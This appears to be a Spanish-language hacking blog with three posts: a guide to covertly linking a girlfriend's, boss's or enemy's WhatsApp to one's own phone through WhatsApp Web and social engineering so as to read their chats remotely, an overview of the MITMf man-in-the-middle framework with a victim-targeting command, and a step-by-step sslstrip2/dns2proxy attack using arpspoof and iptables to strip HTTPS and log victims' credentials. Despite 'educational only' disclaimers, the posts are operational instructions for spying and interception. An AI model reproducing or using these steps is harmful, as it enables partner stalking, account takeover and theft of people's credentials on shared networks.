martes, 5 de abril de 2016

Hackea el whatsapp de tu novia / Jefe / Enemigo / Mascota etc



Una pregunta muy recurrente en Internet es si es posible hackear whatsapp y leer las conversaciones de alguien mas


Y la respuesta es NO y SI


Al momento de escribir este articulo no hay ninguna vulnerabilidad que permita leer remotamente las conversaciones ajenas, antes se podía tener mas de una sesión asociadas a un solo numero lo cual permitía spoofear cualquier número fácilmente, ademas los datos no viajaban cifrados por lo que eran fácilmente interceptables mediante MITM, pero a lo largo de los años la seguridad de whatsapp se ha hecho mas robusta. por eso es que no es posible Hackear whatsapp mediante alguna vulnerabilidad.




pero como siempre, es bueno ver todos los vectores de ataque que existen y seguir la cadena del sistema, en este caso:


SERVIDORES DE WHATSAPP ---> APLICACION ----> USUARIO FINAL



como vimos es muy difícil hacer algo con la seguridad de whatsapp y sus servidores pero si seguimos la cadena nos encontramos con la aplicación y por ultimo el usuario final, aunque la aplicación para celulares no contiene alguna vulnerabilidad grave (o no se ha encontrado aun) si es posible utilizar las funciones con las que cuenta para intervenir alguna cuenta de whatsapp ... lo cual te permitiría en cuestión de segundos activar los mecanismos adecuados mediante Ingenieria Social al USUARIO FINAL para tener acceso remoto a sus conversaciones Solo haciendo lo siguiente:



LA INFORMACIÓN PRESENTADA AQUÍ ES SOLO DE CARÁCTER EDUCATIVO,

ESPIAR CONVERSACIONES ESTA PROHIBIDO EN MUCHOS LUGARES,

TE RECOMIENDO PROBAR LO EXPUESTO EN TU CELULAR O CON EL DEBIDO PERMISO PARA PROBARLO EN OTRO CELULAR


Teniendo en cuenta lo anterior comencemos:


hace algunos meses salio a la luz una nueva característica en whatsapp la cual permite abrir tus conversaciones en el navegador, la mecánica es muy fácil solo entras tu whatsapp a la opción whatsapp web le das agregar, en tu navegador abres web.whatsapp.com y escaneas el código QR .. en sencillos pasos se crea una sesión que te permite entrar desde tu navegador a tu whatsapp y leer tus conversaciones desde el navegador.... desde ese momento que probé esa característica note lo peligroso que era que alguien utilizara whatsapp web para tener acceso al whatsapp de alguien mas.








Por ejemplo un chico agarra el celular de su novia, prende su computadora, liga el celular con el navegador de su computadora y listo ya tiene acceso a todas sus conversaciones, pero hay un inconveniente para el chico: El solo podrá acceder cuando este conectado a esa red lo cual limitaría el ataque... tendría que llevar su computadora a todos lados para tener acceso remotamente y lo que es peor .. al inicio solo se podría tener acceso si el celular y la computadora estaban en la misma red , realmente era un ataque muy limitado.


Pero la plataforma de whatsapp web tuvo varias actualizaciones y con estas varias características mas y entre ellas esta:


whatsapp empezó a permitir consultar tu whatsapp remotamente mediante el uso de 3G.

Así que por ejemplo si ligas el whatsapp de tu teléfono a tu computadora en tu red WIFI y después te vas al otro lado del país, aun asi tu computadora tendría acceso a tu whatsapp. Notan el peligro que conlleva esta característica?


El mismo chico toma el celular de su novia prestado, utilizando algo de ingenieria social por ejemplo diciendole que quiere tomar unas fotos con su celular, en cuestion de segundos lo liga a su computadora y listo tiene acceso al whatsapp de su chica pero esta vez no importa que la chica se valla, no importa que la chica viaje al otro lado del mundo, mientras tenga señal y los datos activados el chico será capaz de espiar las conversaciones de whatsapp.




veamos como se puede mejorar el ataque




imaginate que ahora el chico quiere espiar el whatsapp de un jefe, o de un enemigo o alguien del que no es tan cercano , lo que tendría que hacer es invitarlos a su casa, pedirles el celular prestado, llevarsee el celular a su habitación o donde sea que esté su pc/lap y asociar el whatsapp a su computadora, Podría funcionar pero sería algo muy dificil. Todo sería mas facil si se pudiera ligar el whatsapp de un celular a tu celular, lastima que no se pueda...... O si?




Pues te informo que si se puede siguiendo estos pasos:




tienes que dirigirte en el navegador chrome de tu celular y entrar a la siguiente pagina




web.whatsapp.com




ahora en el navegador de tu celular estando en esa pagina busca el menú de opciones y activa la casilla: Solicitar versión de escritorio, al hacer esto te mostrará la pagina tal como la verias en tu pc, con un lindo código QR.




Ahora solo queda utilizar un poco de ingenieria social con la victima para tener su telefono en nuestro poder. quizas algo como: me dejas enviar un sms? , hacer una llamada? tomar una foto? o simplemente aprovechar que descuidaron su celular , entrar a whatsapp y dirigirnos a la opcion web whatsapp.




ahora escaneamos el codigo QR que sale en el navegador de nuestro movil y listo, con eso ya tendriamos acceso remoto a la cuenta de whatsapp de la victima, no importa que se valla muy lejos y nosotros estemos en la escuela, de vacaciones etc... solo sacas tu celular, entras con tus datos o te conectas a algun WIFI y entras a web.whatsapp,com, le das a tu navegador en Solicitar versión de escritorio y listo, estás espiando sus conversaciones.







Notan el peligro que viene con esta caracteristica de whatsapp?, al hacer esto cualquier persona puede espiar las conversaciones de alguien más no importando que estén muy lejos o que estén conectados a diferentes redes.

espero que pronto puedan hacer algo para solucionar este pequeño problema de seguridad, pero siempre recuerda mantener tu celular seguro, con patron de desbloqueo y no prestarlo a cualquier persona, menos a tu novia...quien sabe ....quizas ella ya te está espiando. ;)


ACTUALIZACIÓN:




Al parecer google ha tapado el acceso a la versión web desde el celular sin embargo aun se puede entrar.


Solo entren a google.com activando la versión de escritorio en su celular.. Después busquen Whatsapp web y le dan al primer enlace y listo .. Les seguirá mostrando la página ;)




miércoles, 30 de marzo de 2016

Ataques a la red local con MITMF FRAMEWORK



que es MITMF? Es un framework orientado a hacer ataques Man-In-The-Middle.
Estos son algunos de los plugins que trae incluidos:

SSLstrip+ ( permite snifear conexiones HTTPS parcialmente)

Spoof   (Redireciona el trafico utilizando ARP spoofing, ICMP Redirects, DHCP Spoofing y permite cambiar las consultas DNS en el vuelo.

BeEFAutorun: activa los módulos de BeEf .

AppCachePoison : permite lanzar ataques app cahe poison.

SessionHijacking: este plugin permite el secuestro de sesiones y permite guardar las cookies.

CacheKill: Mata las paginas cacheadas en nuestro navegador mediante la modificación de Headers.

FilePwn -Permite enviar puertas traseras  sobre http utilizando bdfactory.

Inject: Permite inyectar contenido arbitrario dentro del contenido HTML de la victima.

JavaPwn: Permite lanzar ataques Drive-by en maquinas con java desactualizado.

jskeylogger: inyecta un keyloger en Javascript dentro de las paginas de la victima.

Replace: Permite remplazar contenido arbitrario dentro del contenido original de las paginas en HTML.

Upsidedownternet: Gira las imagines de la victima 180 grados 

Como pueden Notar Esta herramienta está muy completa y tiene bastantes Módulos interesantes, Algo sin Duda a su favor es que no solo permite snifear el trafico de un solo protocolo, Tambien es posible sniffear conexiones bajo los siguientes protocolos: FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP y muchos más.

¿Como se utiliza?
La herramienta la podemos descargar directamente desde aquí: 
https://github.com/byt3bl33d3r/MITMf

O Desde la consola:  apt-get install mitmf

para lanzar un ataque a una maquina en especifico solo ejecuta el sigueinte comando: 


mitmf --hsts --spoof --arp -i wlan1 --target 192.168.1.1 --gateway 192.168.1.254

--target  :       aquì tienes que poner la ip de la vicima
--gateway :    la ip del modem

pronto subirè un tutorial de como implementar un ataque con mitmf y el plug-in BeEFAutorun.


miércoles, 26 de noviembre de 2014

Rompiendo HSTS en CHROME y FIREFOX con sslstrip2







Había una vez, hace no mucho tiempo. Un mundo en el que la información transmitida por Internet viajaba en texto plano, Por lo cual cualquier sniffer como cain, ettercap, etc podían Fácilmente interceptar tu información, obtener tus contraseñas de facebook, hotmail, gmail y espiarte a diestra y siniestra.


Para mitigar este gran problema de seguridad decidieron implementar un protocolo mucho mas seguro llamado HTTPS que lo que hace es cifrar la información en SSL. En poco tiempo muchas paginas importantes como entidades bancarias, Paginas de servicios, gmail, hotmail, facebook, etc, Migraron a este protocolo.


Por un tiempo todo funcionó a la perfección. nadie podía sniffear los datos de las paginas cifradas en HTTPS. pero eso cambió en 2009 cuando en una conferencia llamada Black Hat se presentó una herramienta bastante curiosa llamada SSLSTRIP... ¿Que hace esta Herramienta?.

Lo que hace es que reemplaza todas las peticiones HTTPS A HTTP y luego hace MITM entre el cliente y servidor, permitiendo al atacante abolir el protocolo HTTPS y hacer que los datos viajen en texto plano.


Por años se podían sniffear los datos de las paginas aun en HTTPS, por eso es que después

se implementó un nuevo mecanismo de política de seguridad llamado HSTS que lo que hace es que informa al navegador que las conexiones siempre se deben dar bajo SSL/TLS, esta medida de seguridad fue implementada en muchas paginas web pero no solo eso, con el paso del tiempo los navegadores CHROME y FIREFOX incluyeron esta política en sus navegadores por lo que la herramienta SSLSTRIP dejó de ser efectiva para estos navegadores, Solo seguía funcionando en Internet explorer.


Pero hace unos meses LeonardoNve lanzó una versión modificada de SSLSTRIP a la cual llamó "SSLSTRIP2" . Esta nueva versión permite evadir las normas de seguridad HSTS y con la ayuda de otra herramienta llamada dns2proxy Permite hacer lo que hasta hoy era imposible: Sniffear conexiones en navegadores como FIREFOX y CHROME.


A continuación te muestro como llevar a cabo esta técnica no sin antes recordarte que esto es con fines Educativos.


Lo primero que necesitaras serán las 2 herramientas antes mencionadas sslstrip2 y dns2proxy

las 2 las puedes descargar directamente desde aquí:




https://github.com/LeonardoNve




una vez descomprimidas puedes escoger entre Instalar sslstrip2 o Ejecutarla directamente


Para instalarlo solo basta ejecutar el archivo setup.py de la siguiente manera:




python setup.py install


si tenías una versión anterior la remplazará.


Ahora si comencemos el Ataque:


Primero necesitamos activar el ip forward con el siguiente comando:


echo "1" > /proc/sys/net/ipv4/ip_fordward


agregamos estas reglas de iptables:


iptables --flush


ptables --flush -t nat


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000


iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53


Iniciamos arpspoof


arpspoof -i eth0 -t IP-VICTIMA IP-GATEWAY

arpspoof -i eth0 -t GATEWAY IP-VICTIMA


Una vez hecho eso solo es cuestión de iniciar sslstrip


sslstrip -l 9000 -a -w log.txt


y por ultimo para que funcione el ataque debemos de correr dns2proxy:


python dns2proxy


listo .. con esto toda la información del objetivo llegará a nosotros en texto plano.


solo queda abrir el archivo log.txt que generó sslstrip y ahí estará toda la información.


Aquí les dejo un vídeo del proceso. saludos y happy Hacking.





Y aquí otro video Utilizando MITMF para automatizar el proceso: 



https://www.youtube.com/watch?v=Y8I_fkHF5r0